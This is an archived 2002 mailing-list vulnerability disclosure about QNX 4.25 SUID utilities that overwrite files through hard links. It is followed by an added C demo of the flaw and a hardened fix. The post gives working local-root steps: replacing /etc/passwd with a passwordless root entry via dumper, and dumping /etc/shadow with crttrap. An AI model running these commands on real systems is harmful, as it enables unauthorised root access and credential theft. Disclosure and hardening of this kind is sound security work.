Multiple vulnerabilities in QNX

From: Simon Ouellette (einherjat_private)
Date: Fri May 31 2002 - 14:42:17 PDT


    I think I found what appears to be several (or one fundamental) 
    vulnerabilities under QNX (tested on version 4.25). I have not found any 
    documentation/reference to these anywhere, so I assume they/it were not 
    known.
    
    Importance of the bug: any local user can gain root access (which, under QNX, 
    means root access to the entire network, of course).
    
    Nature: some (or "most"? or "all"?) SUID programs that output data to files 
    actually do not look for permissions before overwriting identical (already 
    existing) filenames. Also, they follow hard links (I did not verify how they 
    react to symbolic links). In fact, not only do they overwrite the files, but 
    they give the user ownership of the file. So programs like /bin/dumper, 
    monitor, and the Watcom "sample" utility can be used to overwrite and gain 
    ownership of read-only, root-owned files such as /etc/passwd. From there, 
    it's easy to figure out how to gain root access...
    
    Example exploit, with /bin/dumper:
    
    Let EVIL be the unprivileged user who wants to gain root access.
    
    # link to the passwd file: dumper dumps to [process name].dmp
    $ ln /etc/passwd /home/EVIL/ksh.dmp
    # call the program that will attempt to write to the hard link
    $ dumper -d /home/EVIL -p [PID of EVIL's ksh]
    # have dumper do its job by terminating the monitored process
    $ exit
    # at this point, /etc/passwd is overwritten by the binary dump, and more 
    # importantly: EVIL is now the owner!
    $ echo root::0:0::///:/bin/sh > /etc/passwd
    # but now no login works because /etc/passwd is not owned by userid 0.
    # So you do:
    $ passwd
    # and change your password. This gives /etc/passwd ownership back to root, 
    # keeping the modifications you have made.
    $ su
    #
    
    "monitor" is even easier to exploit, for example, because you can directly 
    specify the filename with the parameter -f /etc/passwd. No need for a link.
    
    Another similar vulnerability was with crttrap. This utility has one 
    interesting parameter/option that allows you to dump the contents of the 
    configuration file... and it is SUID. So all you have to do is:
    $ crttrap -c /etc/shadow
    
    ...and it will dump the shadow file for you (even if you normally do not have 
    read access to it, as is the case for an unprivileged user).
    
    So this can either be seen as multiple vulnerabilities in different 
    programs, or as a single fundamental flaw in the ownership/permissions 
    checking of the filesystem. I could not tell at exactly what level the 
    flaw is.
    
    Could some of you reproduce the exploit and confirm that it works? I would 
    like to make sure that it is not specific to, maybe, some configuration flaw 
    in the systems I used to test it. Also, please check with the most 
    recent QNX versions to see if this is still applicable...
    
    P.S.: I also noticed that Watcom sample and int10, but not monitor, will 
    segfault when they are given long filenames as a parameter... Maybe this can 
    turn into a buffer overflow, but I did not have the time to check.
    
    Simon Ouellette
    
    
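The flaw the message describes, reproduced next to the usual fix, as an added example that is not part of the original post and is not QNX's dumper source. It is written against the POSIX open() flags of a current Linux or BSD libc, not against QNX 4.25, so whether those flags exist there is an assumption; the function names unsafe_dump_open, safe_dump_open and run_demo, the stand-in passwd line and the scratch files under /tmp are all constructed for the demonstration. Root is not needed to run it. The point it shows is that the kernel happily resolves the planted hard link and O_TRUNC empties the linked file, whereas a create with O_EXCL, done after seteuid() to the real user so that a SUID-root program never writes with root's rights, refuses a name the attacker has already put in place.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the post describes: a SUID utility opens its output name with the
 * privilege it holds and truncates whatever is there. A planted hard link to
 * /etc/passwd means the password file is what gets clobbered. */
int unsafe_dump_open(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened variant (hypothetical name, not QNX code). seteuid(getuid()) makes
 * the kernel apply the real user's permissions, so a SUID-root caller stops
 * writing as root; O_EXCL refuses an existing name (the attack's lever);
 * O_NOFOLLOW refuses a symlink at the last component; fstat() on the descriptor
 * we hold confirms a plain, single-link file owned by us. Returns -1 with errno
 * set on failure. */
int safe_dump_open(const char *path)
{
    uid_t real = getuid();
    struct stat st;
    int fd;
    if (seteuid(real) != 0)
        return -1;
    fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != real) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

enum {
    UNSAFE_CLOBBERED    = 1, /* unsafe open replaced the victim via the link */
    SAFE_REFUSED        = 2, /* hardened open rejected the planted name */
    SAFE_REFUSED_EEXIST = 4, /* ...because the name already existed (O_EXCL) */
    SAFE_FRESH_OK       = 8  /* hardened open still accepts an unused name */
};

/* Rebuilds the post's scenario in a scratch directory with constructed data (a
 * stand-in "passwd", never the real one): plant a hard link named ksh.dmp, run
 * both opens against it, clean up. Returns the bitmask, or -1 on setup error. */
int run_demo(void)
{
    char dir[] = "/tmp/qnxdemo.XXXXXX";
    char victim[64], planted[64], fresh[64];
    const char *orig = "root:x:0:0::/:/bin/sh\n";
    struct stat st;
    int fd, result = 0;
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(victim, sizeof victim, "%s/passwd", dir);
    snprintf(planted, sizeof planted, "%s/ksh.dmp", dir);
    snprintf(fresh, sizeof fresh, "%s/fresh.dmp", dir);
    fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (fd < 0 || write(fd, orig, strlen(orig)) != (ssize_t)strlen(orig) ||
        close(fd) != 0 || link(victim, planted) != 0)
        return -1;

    /* Vulnerable open: goes through the link and truncates the victim. */
    fd = unsafe_dump_open(planted);
    if (fd >= 0) {
        if (write(fd, "DUMP", 4) == 4 && stat(victim, &st) == 0 && st.st_size == 4)
            result |= UNSAFE_CLOBBERED;
        close(fd);
    }
    /* Hardened open on the same planted name: refused outright. */
    fd = safe_dump_open(planted);
    if (fd < 0) {
        result |= SAFE_REFUSED;
        if (errno == EEXIST)
            result |= SAFE_REFUSED_EEXIST;
    } else
        close(fd);
    /* Legitimate use still works: an unused name is created as the real user. */
    fd = safe_dump_open(fresh);
    if (fd >= 0) {
        result |= SAFE_FRESH_OK;
        close(fd);
    }
    unlink(fresh); unlink(planted); unlink(victim); rmdir(dir);
    return result;
}

int main(void)
{
    int r = run_demo();
    printf("run_demo() bitmask: %d (15 means all four checks came out as expected)\n", r);
    return r == 15 ? 0 : 1;
}
```

Two practical consequences follow from the hardened version. A dump utility that uses O_EXCL must treat EEXIST as "pick another name or refuse", never as "fall back to truncating", or the protection is gone. And a quick audit on a box like the one in the post is the link count, the second column of "ls -l /etc/passwd": anything above 1 means another name points at the same inode and should be tracked down before any SUID tool is allowed to write into a user-chosen directory.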



    This archive was generated by hypermail 2b30 : Fri May 31 2002 - 14:57:31 PDT